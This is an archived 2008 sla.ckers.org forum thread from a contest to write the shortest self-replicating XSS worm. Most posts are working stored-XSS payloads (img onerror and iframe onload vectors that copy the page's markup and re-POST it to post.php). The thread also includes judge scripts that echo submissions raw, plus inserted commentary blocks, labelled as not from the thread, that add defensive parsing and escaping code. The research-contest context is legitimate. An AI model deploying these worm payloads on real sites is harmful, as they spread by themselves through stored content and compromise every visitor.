Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 15 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 08:27AM

Self referencing image worm:-

<img src="" onerror="appendChild(cloneNode(0));i=innerHTML,h=new XMLHttpRequest;h.open('POST','post.php');h.send('content='+i)">

Expect a ton of posts :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 01/09/2008 08:35AM by Gareth Heyes.

Re: Diminutive XSS Worm Replication Contest
Posted by: Matt Presson
Date: January 09, 2008 08:46AM

@Gareth - You seem to have forgotten the payload, but otherwise nice one.

Here is what I came up with off of yours, though it is 99% yours:
<img src="" onerror="alert('xss');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),send('content='+i)">



Edited 1 time(s). Last edit at 01/09/2008 08:52AM by Matt Presson.

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 09, 2008 09:02AM

Digi7al, your XHR 140 byte xss worm doesn't seem to work here. The PHP complains about missing content.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 09:05AM

Shame about the content type header eh? :( ah well :-

<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 09:47AM

Here's another without XHR:-

<img src="" onerror="appendChild(cloneNode(0));i=innerHTML;with(appendChild(createElement('form')))submit(alert('XSS'),innerHTML='<textarea name=content>'+i,action=(method='post')+'.php')">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 11:10AM

As far as I can tell, both the "application/x-www-form-urlencoded" content type header and encoding (even if improper) honoring the declared content type are mandatory to ensure reliable Apache compatibility (which is required by rule #9).
Moreover, the "We'll assume post.php will properly URL unescape your code" words in rule #2 authorize the assumption that the receiving endpoint is a PHP script processing the POST as urlencoded name-value pairs, e.g. through the auto-populated $_POST superglobal. Therefore, plus signs ("+") will be turned into spaces, and even weirder stuff is gonna happen if your payload contains ampersands ("&") unless you escape them.

For these reasons, I think the shortest fully compliant XHR code so far is the following:
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),206)))"

The 209 bytes above have been the bare minimum I needed to successfully replicate on a stock Apache 2.2.6 (Fedora) powered by PHP 5.2.4 (mod_php), all from FC7 rpms (definitely not an "exotic configuration").

If we drop the explicit header setting but we keep the "+" escaping requirement, assuming Apache or the browser will "automagically" guess the proper content-type (which I couldn't see happening anyway), it becomes:
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),137)))"

140 bytes

Otherwise, dropping all encoding requirements (which doesn't make much sense, IMHO), we could strip it down to:
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),129))"

132 bytes

-- edit
Added missing ")" at the end of the 132 bytes vector spotted by Ronald (just a typo, count was right and remains the same).

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 3 time(s). Last edit at 01/09/2008 01:06PM by ma1.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 11:48AM

Well, it works like a charm on 4 Apache instances, so it's just not true ma1, Apache does handle the content-type itself through content negotiation, everything being sent is executed perfectly. If it wasn't it would fail, but it doesn't fail on 4 machines, the worm gets properly posted and processed like the spec tells us to. But, I'm not the judge.

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 12:19PM

Ronald Wrote:
-------------------------------------------------------
> Well, it works like a charm on 4 Apache instances,
> so it's just not true ma1

Wow, if you're right my 132 byte above is the winner so far, unless I'm missing some post ;)
What a pity I cannot see it working...

> Apache does handle the
> content-type itself through content negotiation

I believed content-negotiation was a mechanism for choosing the variant of the content best suited to the user agent and serving it through the downstream, rather than the other way around.
But if it works like you say, and the upstream is "negotiated" to application/www-form-urlencoded, what does happen to the "+" char I can see in every single XHR entry when it is properly URL unescaped per rule #2? Shouldn't it become " " according to this specification?
In other words, did you try to echo $_POST['content'] in a real post.php script?

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 12:26PM

I haven't managed to get $_POST['content'] on any machine.. Apache 1.3 nor Apache 2, on Windows.. nor Linux.. maybe on another OS..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 12:32PM

No not alone, it is also involved in guessing the mimes, plus the content-type as well as more stuff, like extension mapping.

I did test it with a post.php file, and echoed back the content, of course ;) when stripslashes was applied, it went into a loop, proving that it functions. But, remember I am talking about my vector, plus .mario's one. the IMG vector respectively: 134 and 135 bytes.

I thought about XHR caching, but after some tests that wasn't the case either. So I am a bit in a blur here due to your results. Turn off NoScript! ;))

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 12:46PM

> I did tested it with a post.php file, and echoed
> back content, of course ;)

Leaving the "+" char untouched?
Happy to hear that, I hope RSnake has the same setup as yours, otherwise I'm just second behind .mario "the sniper" :P

> remember I am talking about my
> vector, plus .mario's one. the IMG vector
> respectively: 134 and 135 bytes.

Once the request is on the wire, they're perfectly equivalent to those 132 bytes of mine.

> So I am a bit in a
> blur here due to your results. Turn off NoScript!
> ;))

NEVER!

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 12:46PM

:S I dunno what I'm doing wrong..
<?php
    if(isset($_POST['content']))
        die($_POST['content']);
?><html>
<head>
<title>try 1</title>
</head>
<body>
<script type="text/javascript">
var x=new XMLHttpRequest();
x.open("POST","post.php",false);
x.send("content=hello");
alert(x.responseText);
</script>
</body>
</html>

--edit 1
btw that alerts the same source code, it should alert "hello".

--edit 2
it works with the content-type header

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/09/2008 12:48PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 01:02PM

haha yes..

ma1, This is strange. I can now confirm indeed that it doesn't work. I did try one of my own vectors again on a simple Apache 1.3.39 and it didn't respond anymore. Hmmm, in that case all vectors without the proper encoding are invalid. I'm still trying to understand what happened, or what went wrong here. So, indeed we must rule them out ma1, you're absolutely right here.

btw, your latest 132 misses a: ")" in my testlab, well it's invalid anyhow now.

woohoo! it gets exciting, so short till the end :)

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 01:08PM

@Ronald:
thanks for spotting the missing ")", it was just a transcription typo (the 132 count was right).
Edited above.
Anyway, as far as I can see my 209 is "the shortest compliant XHR possible", right?

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 01:10PM

With the test I meant:
<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 01:22PM

@ma1

Same as mine if this works on IE:-
<img src="" onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 01:26PM

@Gareth:

watch out the "+", it becomes " ".

If it didn't mine would be just:
<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),198))"
(201 bytes)

-- edit 3
did a mess copying and pasting from the wrong post, fixed now

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 3 time(s). Last edit at 01/09/2008 01:48PM by ma1.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 01:42PM

I guess it's official, that the content-type must be set: http://www.w3.org/TR/XMLHttpRequest/#setrequestheader

It states for clients (like a browser):

"If no Content-Type header is in the list of
request headers append a Content-Type header to the list of request
headers with a value of 'application/xml'."
- so that is the default, if none is set.

a real bummer actually, but it was too good to be true. Now it's time to go back in my tracks and find out what caused it to execute while the vector was absent of the required mime.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 01:45PM

@ma1 yes, I saw.

But I like the image better, for various reasons and aesthetics :) so vain, so vain I know.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 01:46PM

Ronald:
so.. we can do this?


<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('<content>'+parentNode.innerHTML.bold(alert('xss')+'</content>')"></b>

?? that would also be awesome..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 01:52PM

@sdc: it also missed: ')'

No that doesn't work :)

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 02:03PM

bah nothing works :(
so, we have 1 more day guys!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 02:12PM

I'm a bit confused now, what kinds of methods do we have now? is it a good idea to sum them up? because it's way muddy now.

IMO this can be ruled out as far as I know:


- XHR without content-type
- vector with only id, or document selectors like: id="bar" bar.foo(), or only document.foo.bar()
- iframes without closing tag (exception on:slice)
- stuff like: src=. since it becomes: =""



Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 02:25PM

Oookay, some clarification needed, it looks like. XHR without content type looks like it's okay. (Sorry, there was some confusion on my part about what FF2.0.0.11 did and didn't automatically send)

Vectors with id="bob" are okay, as long as you define them. Vectors referencing { or < or any often used char should be considered non-starters for the same reason body=onload is a non-starter. It'll conflict with too many pages.

iframes without closing tags are fine (as long as they don't grow) - slices are okay

About the + thing, assume plusses are treated as spaces. Eg:

echo urldecode($_REQUEST[content]);

___REVISED REGARDING XHR___

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 01/09/2008 05:52PM by rsnake.

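A worked example, added here and not posted by anyone in the thread, of the two server-side points argued above: ma1's observation that a PHP endpoint only fills $_POST from a body declared as application/x-www-form-urlencoded (an XHR that sets no header sends application/xml, per the W3C draft quoted later), and rsnake's ruling that "+" is treated as a space. The names parsePostBody, formUrlDecode, simulatePost and demoParsing are my own, the request bodies are constructed, and the model is a simplification of PHP's real parser (it ignores bracketed array names and the rewriting of "." and " " in field names).

```javascript
// Added example (not from the thread): emulates how a PHP-style endpoint such as
// post.php fills $_POST from a request body, so the Content-Type and "+" points
// raised in the thread can be checked offline without a web server.

// Default request Content-Type an XMLHttpRequest of that era added when the
// script set none (the W3C XHR draft quoted in the thread).
const XHR_DEFAULT_CONTENT_TYPE = 'application/xml';

// Decode one application/x-www-form-urlencoded token the way PHP's urldecode
// does: "+" becomes a space first, then %XX escapes are resolved. A malformed
// escape is left as-is instead of throwing, mirroring PHP's lenient behaviour.
function formUrlDecode(token) {
  const plusAsSpace = token.replace(/\+/g, ' ');
  try {
    return decodeURIComponent(plusAsSpace);
  } catch (e) {
    return plusAsSpace;
  }
}

// Build the equivalent of $_POST (simplified, hypothetical helper). Only a
// form-urlencoded body is split into name/value pairs; any other media type,
// including the XHR default, yields an empty object, which is exactly why
// post.php "complains about missing content" in the thread.
function parsePostBody(contentType, body) {
  const fields = {};
  const mediaType = String(contentType || '').split(';')[0].trim().toLowerCase();
  if (mediaType !== 'application/x-www-form-urlencoded') {
    return fields;
  }
  for (const pair of body.split('&')) {
    if (pair === '') continue;
    const eq = pair.indexOf('=');
    const name = formUrlDecode(eq === -1 ? pair : pair.slice(0, eq));
    const value = eq === -1 ? '' : formUrlDecode(pair.slice(eq + 1));
    fields[name] = value; // later duplicates overwrite earlier ones, as in PHP
  }
  return fields;
}

// Simulate what the server sees after an XHR send(): the headers the script
// set (lower-cased names) plus the body. Returns the resulting $_POST model.
function simulatePost(requestHeaders, body) {
  const ct = requestHeaders['content-type'] || XHR_DEFAULT_CONTENT_TYPE;
  return parsePostBody(ct, body);
}

// Constructed sample bodies (not real submissions): the same value containing
// "+" and "&", sent raw and sent with those two characters percent-encoded.
const RAW_BODY = 'content=<b>a+b&c';
const ENCODED_BODY = 'content=<b>a%2Bb%26c';
const FORM_CT = { 'content-type': 'application/x-www-form-urlencoded' };

// Three cases: no header (nothing parsed), header but raw body ("+" lost,
// "&" truncates the value), header and properly encoded body (value intact).
function demoParsing() {
  return {
    noHeader: simulatePost({}, RAW_BODY),
    rawWithHeader: simulatePost(FORM_CT, RAW_BODY),
    encodedWithHeader: simulatePost(FORM_CT, ENCODED_BODY),
  };
}
```

Running demoParsing() shows the three outcomes side by side: without a Content-Type header the endpoint sees no fields at all; with the header but an unencoded body the "+" has become a space and everything after "&" has been split off into a separate (empty) field; only the percent-encoded body arrives unchanged. That is the reason a stored submission handler should always validate the declared media type and reject bodies it cannot parse rather than guess.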
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 02:29PM

For what it's worth, here's my final submission:
form: 152

<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">


xhr: 198

<b><iframe onload="with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

Going to bed now, I'm tired! :) Good luck fellas, have a good one.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 02:42PM

these are the sources of the unofficial judges:
judge1.php
<?php
session_name("XSSCONTEST");
session_start();
	if(isset($_GET['sc'])){
		die(file_get_contents("judge1.php"));
	}
	if(isset($_GET['logout'])){
		session_destroy();header("Location: ?");exit;
	}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>UNOFFICIAL JUDGE OF THE "Diminutive XSS Worm Replication Contest"</title>
<script type="text/javascript" src="js.js"></script>
<style type="text/css">
	@import url('css.css');
</style>
</head>
<body>
<h1>THIS IS THE UNOFFICIAL JUDGE OF THE <a href="http://sla.ckers.org/forum/read.php?2,18790">Diminutive XSS Worm Replication Contest</a></h1>
<?php
if(isset($_SESSION['content'])){
	echo $_SESSION['content'];
?><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!-->
<div id="passed">&nbsp;</div>
<pre>
<?php echo htmlentities($_SESSION['content']);?>
</pre>
<i>Count:<?php
echo $_SESSION['count'];
?> | Length: <?php
echo strlen($_SESSION['content'])."</i>";
}else{
?>
	<form method="post" action="post.php">
	<textarea name=content></textarea>
	<input type=submit>
	</form>
<?php
}
?>
<p>
Att. <a href="http://www.sirdarckcat.net/">sirdarckcat</a> | <a href="?sc">source code</a> | <a href="?logout">logout</a>
</p>
</body>
</html>
judge2.php
<?php
session_name("XSSCONTEST");
session_start();
	if(isset($_GET['sc'])){
		die(file_get_contents("judge2.php"));
	}
	if(isset($_GET['logout'])){
		session_destroy();header("Location: ?");exit;
	}
?>
<html>
<head>
<title>UNOFFICIAL JUDGE OF THE "Diminutive XSS Worm Replication Contest"</title>
<script type="text/javascript" src="js.js"></script>
<style type="text/css">
	@import url('css.css');
</style>
</head>
<body>
<h1>THIS IS THE UNOFFICIAL JUDGE OF THE <a href="http://sla.ckers.org/forum/read.php?2,18790">Diminutive XSS Worm Replication Contest</a></h1>
<?php
if(isset($_SESSION['content'])){
	echo $_SESSION['content'];
?><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!--><!--THIS SHOULDNT BE VISIBLE!!!!-->
<div id="passed">&nbsp;</div>
<pre>
<?php echo htmlentities($_SESSION['content']);?>
</pre>
<i>Count:<?php
echo $_SESSION['count'];
?> | Length: <?php
echo strlen($_SESSION['content'])."</i>";
}else{
?>
	<form method="post" action="post.php">
	<textarea name=content></textarea>
	<input type=submit>
	</form>
<?php
}
?>
<p>
Att. <a href="http://www.sirdarckcat.net/">sirdarckcat</a> | <a href="?sc">source code</a> | <a href="?logout">logout</a>
</p>
</body>
</html>
post.php
<?php
session_name("XSSCONTEST");
session_start();
$_SESSION['count']++;
$_SESSION['content']=stripslashes($_POST['content']);
?>
<script>self.location.href=document.referrer;</script>
js.js
if(document.cookie.match(/noalert=1/)){
	eval("v"+"a"+"r"+" "+"a"+"l"+"e"+"r"+"t"+"="+"'"+"'"+";");
	alert=function(x){
		try{
			if(/^xss$/i.test(x)){
				document.getElementById("passed").innerHTML="CORRECT";
			}else{
				with(document.getElementById("passed"))
					innerText=textContent="WRONG - "+x;
			}
		}catch(e){
			try{
				window.onload=function(){
					alert(x);
				}
			}catch(e){}
		}
	}
	try{
		var tal=function(){
			document.body.appendChild(document.createElement("div")).innerHTML="Return the alert".link("javascript:document.cookie='noalert=0';location.reload();")
		}
	}catch(e){}
}else{
	try{
		var tal=function(){
			document.body.appendChild(document.createElement("div")).innerHTML="Remove alert".link("javascript:document.cookie='noalert=1';location.reload();")
		}
	}catch(e){}
}
if(document.cookie.match(/triggerevents=1/)){
	function trig(odom){
		// Walk every child node and call its inline handlers directly.
		// Each child has to be indexed; the original indexed the NodeList
		// itself, so no handler (and no recursion) ever ran.
		for(var i=0;i<odom.childNodes.length;i++){
			var n=odom.childNodes[i];
			try{n.onmouseover();}catch(e){}
			try{n.onmousemove();}catch(e){}
			try{n.onmousedown();}catch(e){}
			try{n.onclick();}catch(e){}
			try{n.onfocus();}catch(e){}
			try{n.onmouseup();}catch(e){}
			try{n.onblur();}catch(e){}
			try{n.onsubmit();}catch(e){}
			if(n.childNodes){
				trig(n);
			}
		}
	}
	function ttv(){
		trig(document.body);
	}
	try{
		var tev=function(){
			document.body.appendChild(document.createElement("div")).innerHTML="Dont trigger events".link("javascript:document.cookie='triggerevents=0';location.reload();")
		}
	}catch(e){}
}else{
	try{
		function ttv(){}
		var tev=function(){
			document.body.appendChild(document.createElement("div")).innerHTML="Trigger events".link("javascript:document.cookie='triggerevents=1';location.reload();")
		}
	}catch(e){}
}
window.onload=function(){tal();tev();ttv();}
css.css
#passed{background-color:green;color:black;}
h1 a{display:block;}
body,a{background-color:black;color:white;}
textarea{width:100%;background-color:black;color:white;}

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/09/2008 02:51PM by sirdarckcat.

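The judge sources above contain both kinds of output sink side by side: judge1.php echoes $_SESSION['content'] raw (which is what lets a submission replicate) and then prints the same value again through htmlentities() inside a <pre>. The following is an added example, not part of sirdarckcat's judge code, that models those two sinks in JavaScript and checks offline that the encoded version renders inert. escapeHtml, renderStored, hasInlineHandler and demoEscaping are my own names, and the stored submission is a constructed sample reduced to a harmless alert.

```javascript
// Added example (not from the thread): the raw-echo sink versus the
// htmlentities()-style sink seen in judge1.php, modelled in JavaScript.

// Minimal equivalent of PHP htmlentities() for the five characters that
// matter when a value is placed in HTML text or a double-quoted attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Render the fragment of the page that reflects a stored submission, either
// as judge1.php's first sink does (raw echo, unsafe) or through escapeHtml
// (safe). Hypothetical helper standing in for the PHP template.
function renderStored(stored, options) {
  const body = options.escape ? escapeHtml(stored) : stored;
  return '<pre>' + body + '</pre>';
}

// A crude test oracle, not a sanitizer: does any tag inside our own <pre>
// wrapper still carry an on* event-handler attribute? Regex scanning is only
// good enough to check this example's output; real defences encode on output.
function hasInlineHandler(html) {
  const inner = html.replace(/^<pre>|<\/pre>$/g, '');
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(inner);
}

// Constructed stored submission: the shape of the self-referencing image
// vector discussed in the thread, reduced to a harmless alert.
const STORED = '<img src="" onerror="alert(\'XSS\')">';

// Compare both sinks over the same stored value.
function demoEscaping() {
  const unsafe = renderStored(STORED, { escape: false });
  const safe = renderStored(STORED, { escape: true });
  return {
    unsafeHasHandler: hasInlineHandler(unsafe),
    safeHasHandler: hasInlineHandler(safe),
    safeMarkup: safe,
  };
}
```

The encoded fragment still displays the submission verbatim to a human reader (which is what the judge's <pre> block is for) but contains no element the browser will parse, so no onerror can fire; the raw echo is the single line that turns a stored string into a running worm. Note that post.php's stripslashes() call does nothing to change this: it only undoes magic-quotes escaping and is not an output encoder.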
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 02:44PM

149 chars!!!! new leader?

<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">;

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/09/2008 02:47PM by Gareth Heyes.

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 02:50PM

rsnake Wrote:
-------------------------------------------------------
> Vectors with id="bob" are okay, as long as you
> define them.

What about doctype?
Most if not all the vectors posted here reference elements by id using the deprecated <foo id="bar">...<script>bar.doSomething()</script> idiom, which won't work depending on doctype.
I suppose you mean that id="bob" is okay as long as you retrieve the node using document.getElementById("bob") right?

@Ronald:
they both grow (the iframe one on IE only).

@Gareth:
ditto, you can prevent iframe from growing using slice, but it will buy you too many chars.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 01/09/2008 02:53PM by ma1.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 02:52PM

I hope the ; wasn't a mistake Gaz! ->148

<form><input name='content'><iframe onload="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 02:53PM

149 anyway..

<form><input name='content'><img src='' onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/09/2008 02:54PM by sirdarckcat.
